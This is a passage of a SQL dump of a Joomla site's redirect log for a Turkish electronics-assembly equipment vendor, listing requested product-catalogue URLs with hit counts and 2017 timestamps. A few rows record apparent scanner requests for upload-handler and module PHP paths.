00:00:00',301),(14236,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-27 01:07:12','0000-00-00 00:00:00',301),(14237,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name/dirdesc',NULL,'','',3,0,'2017-11-27 01:22:20','0000-00-00 00:00:00',301),(14238,'http://www.3s-technologies.com.tr/en/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','',3,0,'2017-11-27 01:27:49','0000-00-00 00:00:00',301),(14239,'http://3s-technologies.com.tr/index.php/tr/ueruenler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-11-27 01:28:41','0000-00-00 00:00:00',301),(14240,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-27 01:28:58','0000-00-00 00:00:00',301),(14241,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10?language=en-gb&filter_product=',NULL,'','',7,0,'2017-11-27 02:13:53','0000-00-00 00:00:00',301),(14242,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-5?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-27 02:33:57','0000-00-00 00:00:00',301),(14243,'http://www.3s-technologies.com.tr/en/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',3,0,'2017-11-27 02:57:43','0000-00-00 00:00:00',301),(14244,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-11-27 05:27:20','0000-00-00 00:00:00',301),(14245,'http://3s-technologies.com.tr/tr/urunler/mx200lp-detail?tmpl=component&print=1',NULL,'','',11,0,'2017-11-27 06:00:05','0000-00-00 00:00:00',301),(14246,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2017-11-27 06:12:14','0000-00-00 00:00:00',301),(14247,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-27 07:05:49','0000-00-00 00:00:00',301),(14248,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1.2mm-detail',NULL,'','',21,0,'2017-11-27 07:14:16','0000-00-00 00:00:00',301),(14249,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',10,0,'2017-11-27 07:46:25','0000-00-00 00:00:00',301),(14250,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-27 08:06:42','0000-00-00 00:00:00',301),(14251,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-27 08:08:21','0000-00-00 00:00:00',301),(14252,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic',NULL,'','',15,0,'2017-11-27 08:13:39','0000-00-00 00:00:00',301),(14253,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',198,0,'2017-11-27 08:21:09','0000-00-00 00:00:00',301),(14254,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/kester',NULL,'','',25,0,'2017-11-27 08:28:06','0000-00-00 00:00:00',301),(14255,'http://3s-technologies.com.tr/en/templates/index.php',NULL,'3s-technologies.com.tr','',5,0,'2017-11-27 09:25:19','0000-00-00 00:00:00',301),(14256,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',9,0,'2017-11-27 10:52:44','0000-00-00 00:00:00',301),(14257,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2017-11-27 11:02:46','0000-00-00 00:00:00',301),(14258,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-27 11:03:43','0000-00-00 00:00:00',301),(14259,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-27 11:12:42','0000-00-00 00:00:00',301),(14260,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',15,0,'2017-11-27 12:23:21','0000-00-00 00:00:00',301),(14261,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-27 12:32:46','0000-00-00 00:00:00',301),(14262,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_name?language=en-gb',NULL,'','',25,0,'2017-11-27 12:49:02','0000-00-00 00:00:00',301),(14263,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-27 12:54:20','0000-00-00 00:00:00',301),(14264,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-27 13:16:51','0000-00-00 00:00:00',301),(14265,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,ordering',NULL,'','',7,0,'2017-11-27 13:30:05','0000-00-00 00:00:00',301),(14266,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-27 13:46:24','0000-00-00 00:00:00',301),(14267,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-27 13:52:49','0000-00-00 00:00:00',301),(14268,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_250x250.jpg',NULL,'','',1,0,'2017-11-27 14:07:15','0000-00-00 00:00:00',301),(14269,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-27 14:15:11','0000-00-00 00:00:00',301),(14270,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',4,0,'2017-11-27 14:19:45','0000-00-00 00:00:00',301),(14271,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-5?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-27 14:46:04','0000-00-00 00:00:00',301),(14272,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-27 14:58:04','0000-00-00 00:00:00',301),(14273,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-27 15:08:48','0000-00-00 00:00:00',301),(14274,'http://www.3s-technologies.com.tr/index.php/en/products/flux/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-27 15:17:47','0000-00-00 00:00:00',301),(14275,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-27 15:35:04','0000-00-00 00:00:00',301),(14276,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/results,1-10',NULL,'','',7,0,'2017-11-27 15:38:44','0000-00-00 00:00:00',301),(14277,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_sku?language=tr-tr',NULL,'','',25,0,'2017-11-27 16:00:13','0000-00-00 00:00:00',301),(14278,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-27 16:44:14','0000-00-00 00:00:00',301),(14279,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-50?language=en-gb&filter_product=',NULL,'','',7,0,'2017-11-27 16:48:59','0000-00-00 00:00:00',301),(14280,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-27 17:01:03','0000-00-00 00:00:00',301),(14281,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,ordering/results,1-20',NULL,'','',3,0,'2017-11-27 18:03:20','0000-00-00 00:00:00',301),(14282,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/dirdesc',NULL,'','',35,0,'2017-11-27 18:07:29','0000-00-00 00:00:00',301),(14283,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-10?language=en-gb&filter_product=',NULL,'','',1,0,'2017-11-27 18:16:47','0000-00-00 00:00:00',301),(14284,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-27 18:31:37','0000-00-00 00:00:00',301),(14285,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-27 18:44:32','0000-00-00 00:00:00',301),(14286,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-27 18:53:24','0000-00-00 00:00:00',301),(14287,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-50?language=en-gb&filter_product=',NULL,'','',1,0,'2017-11-27 19:09:28','0000-00-00 00:00:00',301),(14288,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-11-27 19:15:39','0000-00-00 00:00:00',301),(14289,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-27 19:18:15','0000-00-00 00:00:00',301),(14290,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',18,0,'2017-11-27 19:23:31','0000-00-00 00:00:00',301),(14291,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-27 19:28:00','0000-00-00 00:00:00',301),(14292,'http://3s-technologies.com.tr/index.php/tr/ueruenler/955lc-37-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-27 20:00:04','0000-00-00 00:00:00',301),(14293,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-10?language=en-gb&filter_product=',NULL,'','',6,0,'2017-11-27 20:02:08','0000-00-00 00:00:00',301),(14294,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_cwt_250x250.png',NULL,'','',1,0,'2017-11-27 20:04:49','0000-00-00 00:00:00',301),(14295,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name',NULL,'','',223,0,'2017-11-27 20:10:56','0000-00-00 00:00:00',301),(14296,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-27 20:25:54','0000-00-00 00:00:00',301),(14297,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-27 20:27:53','0000-00-00 00:00:00',301),(14298,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name/results,1-50',NULL,'','',8,0,'2017-11-27 20:37:16','0000-00-00 00:00:00',301),(14299,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',9,0,'2017-11-27 20:48:45','0000-00-00 00:00:00',301),(14300,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-20?language=en-gb&filter_product=',NULL,'','',7,0,'2017-11-27 20:54:50','0000-00-00 00:00:00',301),(14301,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',53,0,'2017-11-27 20:56:59','0000-00-00 00:00:00',301),(14302,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-34-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-27 21:14:01','0000-00-00 00:00:00',301),(14303,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-27 21:15:03','0000-00-00 00:00:00',301),(14304,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-50?language=en-gb&filter_product=',NULL,'','',7,0,'2017-11-27 22:22:37','0000-00-00 00:00:00',301),(14305,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',25,0,'2017-11-27 22:41:27','0000-00-00 00:00:00',301),(14306,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',13,0,'2017-11-27 22:48:58','0000-00-00 00:00:00',301),(14307,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=en-gb',NULL,'','',24,0,'2017-11-27 22:49:43','0000-00-00 00:00:00',301),(14308,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_name?language=tr-tr',NULL,'','',14,0,'2017-11-27 23:09:31','0000-00-00 00:00:00',301),(14309,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',53,0,'2017-11-27 23:40:26','0000-00-00 00:00:00',301),(14310,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-27 23:47:42','0000-00-00 00:00:00',301),(14311,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim',NULL,'','',5,0,'2017-11-28 00:07:59','0000-00-00 00:00:00',301),(14312,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name?language=en-gb',NULL,'','',7,0,'2017-11-28 00:11:40','0000-00-00 00:00:00',301),(14313,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-20?language=en-gb&filter_product=',NULL,'','',1,0,'2017-11-28 00:33:07','0000-00-00 00:00:00',301),(14314,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',24,0,'2017-11-28 00:41:30','0000-00-00 00:00:00',301),(14315,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',6,0,'2017-11-28 00:49:50','0000-00-00 00:00:00',301),(14316,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-28 00:50:27','0000-00-00 00:00:00',301),(14317,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-28 01:00:27','0000-00-00 00:00:00',301),(14318,'http://3s-technologies.com.tr/en/products/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-28 01:05:42','0000-00-00 00:00:00',301),(14319,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',4,0,'2017-11-28 01:06:35','0000-00-00 00:00:00',301),(14320,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-28 01:07:34','0000-00-00 00:00:00',301),(14321,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',23,0,'2017-11-28 01:11:14','0000-00-00 00:00:00',301),(14322,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-28 01:37:55','0000-00-00 00:00:00',301),(14323,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',15,0,'2017-11-28 01:46:42','0000-00-00 00:00:00',301),(14324,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering',NULL,'','',6,0,'2017-11-28 02:00:03','0000-00-00 00:00:00',301),(14325,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-28 02:00:26','0000-00-00 00:00:00',301),(14326,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_name?language=tr-tr',NULL,'','',24,0,'2017-11-28 02:02:17','0000-00-00 00:00:00',301),(14327,'http://www.3s-technologies.com.tr/index.php/tr/component/content/article/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-28 02:06:51','0000-00-00 00:00:00',301),(14328,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering',NULL,'','',5,0,'2017-11-28 02:25:10','0000-00-00 00:00:00',301),(14329,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku',NULL,'','',2,0,'2017-11-28 02:33:32','0000-00-00 00:00:00',301),(14330,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-28 02:38:21','0000-00-00 00:00:00',301),(14331,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-10',NULL,'','',10,0,'2017-11-28 02:41:54','0000-00-00 00:00:00',301),(14332,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-28 03:12:21','0000-00-00 00:00:00',301),(14333,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name',NULL,'','',4,0,'2017-11-28 03:15:23','0000-00-00 00:00:00',301),(14334,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-28 03:17:27','0000-00-00 00:00:00',301),(14335,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-28 03:32:52','0000-00-00 00:00:00',301),(14336,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer',NULL,'','',4,0,'2017-11-28 03:33:10','0000-00-00 00:00:00',301),(14337,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/kester',NULL,'','',27,0,'2017-11-28 03:50:20','0000-00-00 00:00:00',301),(14338,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',6,0,'2017-11-28 03:57:15','0000-00-00 00:00:00',301),(14339,'http://3s-technologies.com.tr/en/products/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',18,0,'2017-11-28 04:28:51','0000-00-00 00:00:00',301),(14340,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc',NULL,'','',3,0,'2017-11-28 04:30:44','0000-00-00 00:00:00',301),(14341,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',53,0,'2017-11-28 04:59:13','0000-00-00 00:00:00',301),(14342,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-28 05:13:46','0000-00-00 00:00:00',301),(14343,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',14,0,'2017-11-28 05:28:56','0000-00-00 00:00:00',301),(14344,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-28 05:43:21','0000-00-00 00:00:00',301),(14345,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-40',NULL,'','',1,0,'2017-11-28 05:46:05','0000-00-00 00:00:00',301),(14346,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-28 05:46:30','0000-00-00 00:00:00',301),(14347,'http://3s-technologies.com.tr/en/products/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-28 05:46:36','0000-00-00 00:00:00',301),(14348,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',42,0,'2017-11-28 05:47:09','0000-00-00 00:00:00',301),(14349,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku',NULL,'','',2,0,'2017-11-28 06:02:50','0000-00-00 00:00:00',301),(14350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',10,0,'2017-11-28 06:11:12','0000-00-00 00:00:00',301),(14351,'http://3s-technologies.com.tr/index.php/en/products/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-28 06:11:53','0000-00-00 00:00:00',301),(14352,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2017-11-28 06:36:19','0000-00-00 00:00:00',301),(14353,'http://3s-technologies.com.tr/index.php/tr/ueruenler/e-bar-26-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-28 07:00:46','0000-00-00 00:00:00',301),(14354,'http://3s-technologies.com.tr/cache/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',7,0,'2017-11-28 07:12:41','0000-00-00 00:00:00',301),(14355,'http://3s-technologies.com.tr/modules/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',9,0,'2017-11-28 07:13:16','0000-00-00 00:00:00',301),(14356,'http://3s-technologies.com.tr/modules/mod_jmodule/mod_jmodule.php',NULL,'3s-technologies.com.tr','',7,0,'2017-11-28 07:13:38','0000-00-00 00:00:00',301),(14357,'http://3s-technologies.com.tr/language/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',10,0,'2017-11-28 07:14:52','0000-00-00 00:00:00',301),(14358,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc',NULL,'','',9,0,'2017-11-28 07:18:10','0000-00-00 00:00:00',301),(14359,'http://3s-technologies.com.tr/media/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',17,0,'2017-11-28 07:18:30','0000-00-00 00:00:00',301),(14360,'http://3s-technologies.com.tr/templates/j11templates/j11templates.php',NULL,'3s-technologies.com.tr','',9,0,'2017-11-28 07:20:21','0000-00-00 00:00:00',301),(14361,'http://3s-technologies.com.tr/templates/jtemplates/jtemplates.php',NULL,'3s-technologies.com.tr','',10,0,'2017-11-28 07:21:04','0000-00-00 00:00:00',301),(14362,'http://3s-technologies.com.tr/plugins/jplugin/jplugin/j2plugin.php',NULL,'3s-technologies.com.tr','',7,0,'2017-11-28 07:21:37','0000-00-00 00:00:00',301),(14363,'http://3s-technologies.com.tr/templates/j9templates/j9templates.php',NULL,'3s-technologies.com.tr','',9,0,'2017-11-28 07:22:09','0000-00-00 00:00:00',301),(14364,'http://3s-technologies.com.tr/logs/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',17,0,'2017-11-28 07:22:58','0000-00-00 00:00:00',301),(14365,'http://3s-technologies.com.tr/components/thumbsj3tmp/img.resize.php',NULL,'3s-technologies.com.tr','',10,0,'2017-11-28 07:23:53','0000-00-00 00:00:00',301),(14366,'http://3s-technologies.com.tr/templates/j7templates/j7templates.php',NULL,'3s-technologies.com.tr','',8,0,'2017-11-28 07:24:11','0000-00-00 00:00:00',301),(14367,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-28 07:43:17','0000-00-00 00:00:00',301),(14368,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name?language=en-gb',NULL,'','',27,0,'2017-11-28 07:44:33','0000-00-00 00:00:00',301),(14369,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_sku?language=tr-tr',NULL,'','',12,0,'2017-11-28 08:03:45','0000-00-00 00:00:00',301),(14370,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2017-11-28 08:16:46','0000-00-00 00:00:00',301),(14371,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-11-28 08:25:16','0000-00-00 00:00:00',301),(14372,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-28 08:30:38','0000-00-00 00:00:00',301),(14373,'http://3s-technologies.com.tr/en/home2/79-english-uk',NULL,'','',30,0,'2017-11-28 08:37:05','0000-00-00 00:00:00',301),(14374,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-28 08:41:53','0000-00-00 00:00:00',301),(14375,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-28 08:47:46','0000-00-00 00:00:00',301),(14376,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',25,0,'2017-11-28 08:52:39','0000-00-00 00:00:00',301),(14377,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-28 08:57:34','0000-00-00 00:00:00',301),(14378,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-28 09:15:23','0000-00-00 00:00:00',301),(14379,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2017-11-28 09:40:29','0000-00-00 00:00:00',301),(14380,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-40',NULL,'','',1,0,'2017-11-28 09:42:51','0000-00-00 00:00:00',301),(14381,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/dirdesc?language=tr-tr',NULL,'','',30,0,'2017-11-28 09:44:24','0000-00-00 00:00:00',301),(14382,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-28 10:11:50','0000-00-00 00:00:00',301),(14383,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-28 10:11:56','0000-00-00 00:00:00',301),(14384,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',16,0,'2017-11-28 10:12:00','0000-00-00 00:00:00',301),(14385,'http://3s-technologies.com.tr/en/products/avf-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-28 10:12:08','0000-00-00 